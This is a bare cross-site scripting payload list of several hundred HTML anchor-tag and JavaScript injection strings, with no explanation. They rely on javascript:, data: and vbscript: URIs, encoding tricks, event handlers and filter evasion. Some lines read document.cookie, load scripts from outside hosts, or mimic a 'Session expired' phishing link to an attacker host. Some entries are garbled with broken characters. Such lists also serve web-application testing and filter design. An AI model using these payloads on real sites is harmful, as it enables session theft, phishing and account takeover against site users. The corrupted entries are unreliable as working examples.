- aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
- aha <script src=>alert(/IE|Opera/)</script>
- <a href=````>
- a.href=’#’
- <a/href[\0C]=ja	vasc	ript:confirm(1)>XXX</a>
- <a href=[0x0b]” onclick=confirm(1)//”>click</a>
- <a href=[0x0b]renwax23" onfocus=prompt(1) autofocus fragment=”
- <a href=”javascript:alert(1)">Test</a>
- <a href=”javascript:confi 14m(1)">Clickhere</a>
- <a href=”javascript:confirm(1)">Clickhere</a>
- <a href=”javascript:alert(1)”>CLICK ME<a>
- <a href=”&#106&#97&#118&#97&& #35115&#99&#114&#105&# 912&#116&#58&#99&#111& #38#110&#102&#105&#114 8#109&#40&#49&#41">Clickhere</a>
- <a href=”&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
- <a href=”about:<script>document.vulnerable=true;</script>”>
- <! — <A href=”- →<a href=javascript:alert:document.domain>test →
- <a href=”[a]java[b]script[c]:alert(1)”>XXX</a>
- <a href=����&/onclick=alert(9)>foo</a>
- ?a href=asfunction:System.Security.allowDomain,evilhost?
- <a href=”//ben.mario#%0Aalert(3);”>CLICKME</a>
- <a href=``calc``>
- <a href=”//???????”>click</a>
- <a href=”data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>click</a>?
- <a href=”data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>click</a>
- <a href=”data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”	 >X</a
- <a href=”data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==” >X</a
- <a/href=data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>
- <a href=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”><img src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”></a>
- <a href=”data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >”>CLICK</a>
- <a href=”data:text/html,%3cscript>confirm (1)</script>” >hello
- “><a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>click</a>
- <a href=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+>clickme
- <a href=��data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+��>ClickMe
- <a href=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+>ClickMe
- <a href=”data:text/html;base64,PHN2Zy?9vbmxv?YWQ<>>9YWxlc>>>nQoMSk”>click</a>
- <a href=”data:text/html;base64,PHN2Zye?L9vbmxva?EYWQ<>>9YWxlc>>>nQoMSk+”>click</a>
- <a href=��data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg��>foo</a>
- <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”>test</a>
- <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+ “>click<a>
- <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4=”>Test</a>
- <a HREF=”data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==”>ugh</a>
- <a href=’data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==’>click<a>
- <a href=”data:text/html;base64_,<svg/onload=\u0061le%72t(1)>”>X</a
- <a href=”data:text/html;base64_,<svg/onload=\u0061le%72t(1)>”>X</a
- “/><a href=”data:text/html;base64_,<svg/onload=\u0061le%72t(1)>”>X</a
- <a href=”data:text/html;base64xoxoxox,<body/onload=alert(1)>”>click</a>
- <a href=”data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- <a href=”data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
- <a href=��data:text/html;charset=utf-16,%ff%fe%3c%00s%00c%00r%00i%00p%00t%00%3e%00a%00l%00e%00r%00t%00(%009%00)%00<%00/%00s%00c%00r%00i%00p%00t%00>%00��>foo</a>
- <a href=”data:text/html,<script>eval(name)</script>” target=”alert(‘ @garethheyes @0x6D6172696F ‘)”>click</a>
- <a href=”data:text/html,<script>eval(name)</script>” target=”confirm(1)”>click</a>
- <a$href=”data:text/html,%style=””3cscript>confirm((1)</sstyle=””cript>” onerror=>hello
- <a href=”data:text/html,<script>alert(1)</script>”>Click<test>
- <a href=”data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>Click<test>
- <a href=``explorer.exe``>
- <a href=”feed:javascript:alert(1)”>click</a>
- <;A HREF=”;//google”;>;XSS<;/A>;
- <A HREF=”//google”>XSS</A>
- <;A HREF=”;http://0102.0146.0007.00000223/";>;XSS<;/A>;
- <A HREF=”http://0102.0146.0007.00000223/">XSS</A>
- <A HREF=”http://0300.0250.0000.0001>XSS</A>
- <;A HREF=”;http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
- <A HREF=”http://0x42.0x0000066.0x7.0x93/">XSS</A>
- <A HREF=”http://0xc0.0xa8.000.001>XSS</A>
- <;A HREF=”;http://1113982867/";>;XSS<;/A>;
- <A HREF=”http://1113982867/">XSS</A>
- <A HREF=”http://127.0.0.1/">XSS</A>
- <A HREF=”http://3232235521>XSS</A>
- <A HREF=”http://3w.org">XSS</A>
- <A HREF=”http://6	6.000146.0x7.147/">XSS</A>
- <A HREF=”htt p://6 6.000146.07.147/””>XSS</A>
- <A HREF=”http://6 6.000146.07.147/””>XSS</A>
- <A HREF=”h tt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
- <A HREF=http://66.102.7.147/>link</A>
- <;A HREF=”;http://66.102.7.147/";>;XSS<;/A>;
- <A HREF=”http://66.102.7.147/">XSS</A>
- <A HREF=”h tt p://6	6.000146.0x7.147/”>XSS</A>
- <A HREF=”htt p://6	6.000146.0x7.147/”>XSS</A>
- <A HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A>
- <;A HREF=”;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
- <A HREF=”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
- <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=x:x onerror=javascript:alert(1)></a>”>
- <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=xx:x onerror=alert(1)></a>”>
- <;A HREF=”;http://google.com/";>;XSS<;/A>;
- <A HREF=”http://google.com/">XSS</A>
- <;A HREF=”;http://google:ha.ckers.org";>;XSS<;/A>;
- <A HREF=”http://google:ha.ckers.org">XSS</A>
- <;A HREF=”;http://ha.ckers.org@google";>;XSS<;/A>;
- <A HREF=”http://ha.ckers.org@google">XSS</A>
- <a href=”https://4294967298915183000">click</a>=>google
- <a href=https://attacker/>Session expired. Please login again.</a>
- <a href=”http://”/><script>alert(‘zombie’)</script>@www.grayhat.in/">hackers</a>
- <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>;
- <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
- <;A HREF=”;http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
- <A HREF=”http://www.gohttp://www.google.com/ogle.com/">XSS</A>
- <a href=http://www.google.com">Clickme</a>
- <a href=��http://www.google.com>Clickme</a>
- <a href=http://www.google.com>Clickme</a>
- <;A HREF=”;http://www.google.com./";>;XSS<;/A>;
- <A HREF=”http://www.google.com./">XSS</A>
- <a href=”http://www.xyydyt.com" style=”color:#143d70; simsun;” onclick=”alert(/a/);this.style.behavior=’url(#default#homepage)’;this.setHomePage(‘http://www.xyydyt.com'); return(false);”>asdasdsad</a>
- <A HREF=ht://www.google.com/>link</A>
- <;A HREF=”;h
tt	p://6&;#09;6.000146.0x7.147/”;>;XSS<;/A>;
- <a href=”// ID.ws”>CLICK
- <a href=����&<img&/onclick=alert(9)>foo</a>
- <a href=”invalid:1" id=x name=y>test</a>
- “/><a href=”invalid:2" id=x name=y>test</a>
- <a href=”javascript:window[‘confirm’](1)”>aa</a>
- <a href=”javascript:alert%252831337%2529">Hello</a>
- <a href=”j[785 bytes of ]avascript:alert(1);”>XSS</a>
- <a href=”j[785 bytes of (
	)]avascript:alert(1);”>XSS</a>
- <a href=”javAascript:javascript:alert(1)”>test1</a>
- <a href=”javaascript:javascript:alert(1)”>test1</a>
- <a href=”javascript:alert(‘xss’)”>link</a>
- <a href=javascript:alert(1)>XXX</a>
- <a href=javascript:javascript:alert(1)>XXX</a>
- <a+href=”javascript#alert(1);”>
- <a href=”javascrip:alert(document.cookie)”>
- <a href=”jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”>click me</a>
- <a href=”javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)”>click</a>
- <a/href=”javascript: javascript:prompt(1)”><input type=”X”>
- <a href=”//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a>
- <a href=javascript:alert(1)>
- <a href=javascript:alert(163)>click
- <a href=javascript:alert(19)>M
- <a href=javascript:alert(1)>click
- <a href=javascript:alert(1)>click
- <a href=javascript:alert(1)>Clickme</a>
- <a href=”javascript:alert(1)-html”>click me</a>
- <a href=”javascript:alert(1)//html”>click me</a>
- <a href=”javascript:alert(1)”>Link</a>
- <a href=”javascript:alert(1)” onmouseover=alert(1)>INJECTX HOVER</a>
- <a href = “javas cript :ale rt(1)”>test
- <a href=javascript:alert%28 /xss/%29>clickme
- <a href=”javascript:alert(3)”>Link</a>
- <a href=”javascript:alert(72)%%0D3C! —
- <a href=”javascript:alert(9)”>atul t</a>
- <a href=javascript:alert(9) href href=�� href=����>foo</a>
- <a href=”javascript:alert(‘test’)”>link</a>
- <a href=”javascript:alert(‘xss’)”>
- <a href=”javascript#alert(‘XSS’);”>
- ><a href=javascript:alert(/Xss-By-Muhaddi/)Click Me</a>
- ><a href=javascript:alert(/Xss/)Click Me</a>
- ��><a href=javascript:alert(/Xss/)Click Me</a>
- <a href=”javascript:𝕒𝓁𝔢𝔯𝕥(1)”>CLICKME</a>
- <a href=��javascript:��>Clickme</a>
- <a href=javascript:>Clickme</a>
- <a href=”javascript:alert(1)”>click</a>
- <a href=”jAvAsCrIpT:alert(1)”>X</a>
- <a href=javascript:alert(document.cookie)>Click Here</a>
- <a href=”javascript:alert(document.domain)”>Click Here</a>
- <a href=”javascript:'<script src=//Ð.pw>⃒</script>⃒'”>CLICK</a>
- <a href=javascript:confirm(2)>M
- <a href=”jAvAsCrIpT:confirm(1)”>X</a>
- “><a href=javascript:confirm(document.cookie)>Click Here</a>
- “/><a href=javascript:confirm(document.cookie)>Click Here</a>
- <a href=javascript:confirm(document.cookie)>Click-XSS</a>
- “><a/href=javascript:co\u006efir\u006d("1")>clickme</a>
- <a href=”javascript:\u0061le%72t(1)”><button>
- “><a href=”javascript:\u0061le%72t(1)”><button>
- <A/HREF=”javascript:confirm(1)”>
- “><a href=”javascript:confirm%28 1%29">Clickme</a>
- “><a href=”javascript:co\u006efir\u006d%28 1%29">Clickme</a>
- <a href=”javascript:data:alert(1)”>click</a>
- <A HREF=”javascript:document.location=’http://www.google.com/’”>link</A>
- <;A HREF=”;javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
- <A HREF=”javascript:document.location=’http://www.google.com/'">XSS</A>
- <a href=”javascript#document.vulnerable=true;”>
- <a href=”javascript:document.write(‘spoof’); void(0);”>Middle-click me</a>
- “><a href=”JAVASCRIPT:%E2%80%A8alert`1`”>
- <a href=”javascript:’hello’” rel=”sidebar”>x</a>
- <a href=’javascript:http://@cc_on/confirm%28location%29'>click</a>
- <a href=”javascript:javascript:alert(1)”><event-source src=”data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A”>
- <a/href=”javascript: javascript:prompt(1)”><input type=”X”>
- <a href=javascript:…>me</a>
- “><a href=javascript:prompt(1)>Clickme</a>
- “><a href=javascript:prompt%28 1%29>Clickme</a>
- <a href=”javascript:void(0)”>click</a>
- <a href=”javascript:void(0)” onmouseover=
javascript:alert(1)
>X</a>
- <a href=”javascript:void(0)” onmouseover=
javascript:confirm(1)
>X</a>
- <a href=”javascript\x00:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript\x09:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript\x0A:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript\x0D:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=javascript&.x3A;alert&(x28;1&)x29;//=>
- <a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme
- <a href=”javascript\x3A:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript\x3Ajavascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javascript:x=open(‘http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20’http://xssor.io/Project/poc/docshell.html';}}}catch(e){}},3000);void(1);">Test</a>
- <a href=javascript:/**/XYZ:alert(202)>Test_202</a>
- <a href=javascript:/*XYZ*/XYZ:javascript:alert(201)>Test_201</a>
- <a href=��javaScrRipt:alert(1)��>Clickme</a>
- <a href=javaScrRipt:alert(1)>Clickme</a>
- <a href=”javas	cri
pt:confirm(1)”>test</a>
- <a href=”javas\x00cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x01cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x02cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x03cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x04cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x05cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x06cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x07cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x08cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x09cript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x0Acript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x0Bcript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x0Ccript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”javas\x0Dcript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a/href=java	script:confirm%28/XSS/%29>click</a>
- <a href=”j	a	v	asc
ri	pt:confirm(1)”>Click<test>
- <a href=”j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(1)”>Click<test>
- <a href=”j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(1)” >Click<test>
- <a/href=”j	a	v	asc	ri	pt:confirm(1)”>Click<test>
- <a href=”j&#x26#x41;vascript:alert%252831337%2529">Hello</a>
- <a href=”j&#x26#x41;vascript:alert%252831337%2529">Hello</a>
- a href=”j&#x26#x41;vascript:confirm%252831337%2529">Hello</a>
- <a href=”javascript:alert(-1)”
- <a <! — → href=”javascript:alert(-1)”>hello</a>
- <a <! — href=”javascript:alert(31337);”>Hello</a>
- <a href=``mspaint.exe``>
- <a href=``notepad.exe``>
- <a href=”#” onclick=”alert(1)”>s</a>
- <a href=”#” onclick=”alert(‘ ');alert(2 ‘)”>name</a>
- <a href= . ����\�� onclick=alert(9) ������>foo</a>
- <a href=”” onclick=``/*/alt=”*//alert(1)//”>clickme</a>
- <a href=”#” onclick=”confirm(‘ ');alert(2 ‘)”>name</a>
- <a href=”” onclick=``/name==alert(1)>clickme</a>
- <a href=”” onmousedown=”var name = ‘';alert(1)//’; alert(‘smthg’)”>Link</a>
- <a href=’#’ onmouseover =”javascript:$(‘a’).html(5)”>a link</a>
- <a href=[?]”? onmouseover=prompt(1)//”>XYZ</a
- <a href=”?q=javascript%3Aalert(31)”>Link</a>
- <a href=”rhainfosec.com” onclimbatree=alert(1)>ClickHere</a>
- <a href=”rhainfosec.com” onmouseover=alert(1)>ClickHere</a>
- <a href=``shell:System``>
- <a href=”//fi.org”>CLICKME</a>
- <a href=”//𝔾𝒪ℴℊℒⅇ.ℂ𝔬ℳ”>CLICKME</a>
- <a href target=_blank>click</a>
- <a href=//target rel=noreferer target=pkav>click</a>
- <a href=uhttp://www.google.com">Clickme</a>
- <a href=’vbscript:MsgBox(“XSS”)’>link</a>
- <a href=’vbscript:”\"&confirm(1)''"’>
- <a href=vjavascript:alert(1)v>Clickme</a>
- <a href=vUserinputv>Click</a>
- <a href=”\/www.google.com/favicon.ico">click</a>
- <;A HREF=”;//www.google.com/";>;XSS<;/A>;
- <A HREF=”//www.google.com/">XSS</A>
- <a href=”\x00javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x01javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x02javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x03javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x04javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x05javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x06javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x07javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x08javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x09javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Bjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Cjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Djavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x0Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x10javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x11javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x12javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x13javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x14javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x15javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x16javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x17javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x18javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x19javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Bjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Cjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Djavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x1Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\x20javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=” javascript:alert(1)”>click</a>
- <a href=”\xC2\xA0javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”x:confirm(1)” id=”test”>click</a><script>eval(test+’’)</script>
- <a href=”\xE1\x9A\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE1\xA0\x8Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x81javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x82javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x83javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x84javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x85javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x86javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x87javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x88javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x89javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\x8Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\xA8javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\xA9javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x80\xAFjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE2\x81\x9Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=”\xE3\x80\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
- <a href=``xss.cx``>
- <a href=”xss.php?a=<sc%0aript>alert(/1/)</script>”>
- <a href=?xss=<script>>link</a>
- <a href=��?xss=<script>��>link</a>
- <a href=”xxx# onclick=alert(1)//[255]”></a>
- <a href=”xxx# onclick=alert(1)//[64kb]”></a>
- ><a id=ahref=javascript:a\u006cer\u0074(/Xss-By-Muhaddi/) id=xss-test>Click me</a>#a <
- ��><a id=��a��href=javascript:a\u006cer\u0074(/Xss-By-Muhaddi/) id=��xss-test��>Click me</a>#a <
- ><a id=ahref=javascript:a\u006cer\u0074(/xss-by-shawar/) id=xss-test>Click me</a>#a <
- <a����id=a href=��onclick=alert(9)>foo</a>
- a id=CLOSURE_BASE_PATHhref=http://attacker/xss /a
- <a id=�� href=����>��href=javascript:alert(9)>foo</a>
- <a id=��href=http://web.site/��onclick=alert(9)>foo</a>
- <a id=��http://web.site/��onclick=alert(9)<!�Vhref=a>foo</a>�V>
- <a id=”x” href=’http://adspecs.yahoo.com/adspecs.php' target=”close(/*grabcookie(1)*/)”>CLICK</a><script>onblur=function(){confirm(4)}x.click();</script>
- <a id=”x”><rect fill=”white” width=”1000" height=”1000"/></a>
- <a id=XSS href=”about:<script>alert(‘XSS’);</script>”>
- a(){};if(true){/*/alert();a=`,x={//
- a(){};if(true){/*/alert();a=`,x={//”’<>\r\n\ being escaped
- aim: &c:\windows\system32\calc.exe” ini=”C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat”
- “/></a></><img src=1.gif onerror=alert(1)>
- <A “””><IMG SRC=”javascript:confirm(1)”>
- a?><img src= onerror=confirm(1)>
- .ajax
- a.jsp/<script>alert(‘Vulnerable’)</script>
- <a language=vbs onclick=’addUser(\”11\\\”&alert(1)\\\”\”)’>add</a>
- [_`${_=`ale`}`]
- ‘ale’%2B’rt’%2Blocation.hash.substr(1)>#(1)
- ale%2Brt%2Blocation.hash.substr(1)>#(1)
- alert``
- A+L+E+R+T;
- +alert(0)+
- ‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)// →</SCRIPT>”>’><SCRIPT>alert(4)</SCRIPT>=&{}”);}alert(6);function xss(){//
- ‘;alert(0)//\’;alert(1)//”;alert(2)//\”;alert(3)// →</SCRIPT>”>’></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}”);}
- alert(+’???0O2471???’)
- ‘;alert(0x000123)’
- ‘+alert(0x000123)+’
- \”; alert(0x000123)
- `${alert(1)/*}`*/}`
- `$alert(1)}`
- */alert(1)/*
- ; alert(1);
- ?alert(1)”,
- ‘|alert(1)|’
- ‘-alert(1)-’
- ‘-alert(1)//
- ‘}};alert(1);{{‘
- ‘}alert(1);{‘
- “-alert(1)-”
- “‘-alert(1)-’”
- “}]}’;alert(1);{{‘
- ({‘ \’(){alert(1)}})[` \`]()
- (alert)(1)
- )alert(1);//
- […`${alert(1)}`]
- ${alert`1`}`
- */alert(1)/*
- \;alert(1)//
- \’-alert(1)//
- \’-alert(1)};{//
- \’}alert(1);{//
- \”;alert(1);//
- \\;alert(1)//
- \\��;alert(1)//
- \��;alert(1)//
- #*/alert(1)
- alert`1`
- alert(1,)//
- alert(1){}{}{}{}
- alert(1){}
- alert(1)
- ‘}alert(1)%0A{‘
- ;alert(123);
- ‘;alert(123);t=’
- “;alert(123);t=”
- ‘>alert(154)</script><script/154=’
- */alert(155)</script><script>/*
- */alert(156)”>’onload=”/*<svg/156=’
- `-alert(158)”>’onload=”`<svg/158=’
- <alert(192)<! — onmouseover=location=innerHTML+outerHTML>javascript:192/*00000*/
- “”});});});alert(1);$(‘a’).each(function(i){$(this).click(function(event){x({y
- <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf)
- alert(1) /alert`2`/i
- “])},alert(1));(function xss() {//
- alert(1)>//INJECTX
- “alert(1)” instanceof [];
- -alert(1)<javascript: onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
- “-alert(1)<javascript:” onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
- -alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:click me!
- “-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:”click me!
- alert(1)(‘lol’,’lol’)(‘lol’,’lol’)(‘lol’,’lol’)(‘lol’,’lol’).x.y.LOL()
- <alert(1)<! — onclick=location=innerHTML+outerHTML>javascript:1/*click me!*/</alert(1)<! — →
- `-alert(1)”>’onload=”`<svg/1=’
- */alert(1)”>’onload=”/*<svg/1=’
- ‘alert(1)’.replace(/.+/,eval)
- “alert(1)”.replace(/./g,function(c){return String.fromCharCode(parseInt(‘26’+c.charCodeAt(0).toString(16),16))})
- */alert(1)</script><script>/*
- ‘>alert(1)</script><script/1=’
- ‘>alert(1)</script><script/1=’
- alert(1)-/><script>///</textarea>
- alert(1)// →</svg><script>0</script>
- -alert(1)-<svg><!V
- ‘-alert(1)-’<svg><!V
- <alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!V>
- “};alert(23);a={“a”:
- /alert`2`/i
- “>*/alert(35)</script><script>/*<kukux//
- alert(1)
- <alert(40)<! — onmouseover=location=innerHTML%2bouterHTML>javascript:1/*00000*/
- `-alert(5)</script><script>`
- “`-alert(67)</script><script>`
- ‘-alert(79)-’
- ‘-alert(80)//
- \’-alert(81)//
- (alert)(82)
- alert(9)��>foo</a>
- -alert(9)<javascript:” onclick=location=tagName+previousSibling.nodeValue>click me!
- ‘-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling.nodeValue>cript:’click me!
- alert(a.source)</SCRIPT>
- alert = a\u006cer\u0074
- Alert = a\u006cer\u0074
- alert.call(this, document.cookie)
- alert(doc.domain); // The same domain as the top page
- alert(document[“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
- alert(document.cookie)
- alert(document[‘cookie’])
- ; alert(document.cookie); var foo=
- ��; alert(document.cookie); var foo=��
- ‘);alert(‘done’);var b=(‘
- alert(/foo bar/.source)
- “;alert(“I am coming again~”);”
- }alert(/INJECTX/);{//
- alert(‘Latitude:’+p.coords.latitude+’,Longitude:’+
- alert(1)
- alert;pg(“XSS”)
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))// — ></SCRIPT>\”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
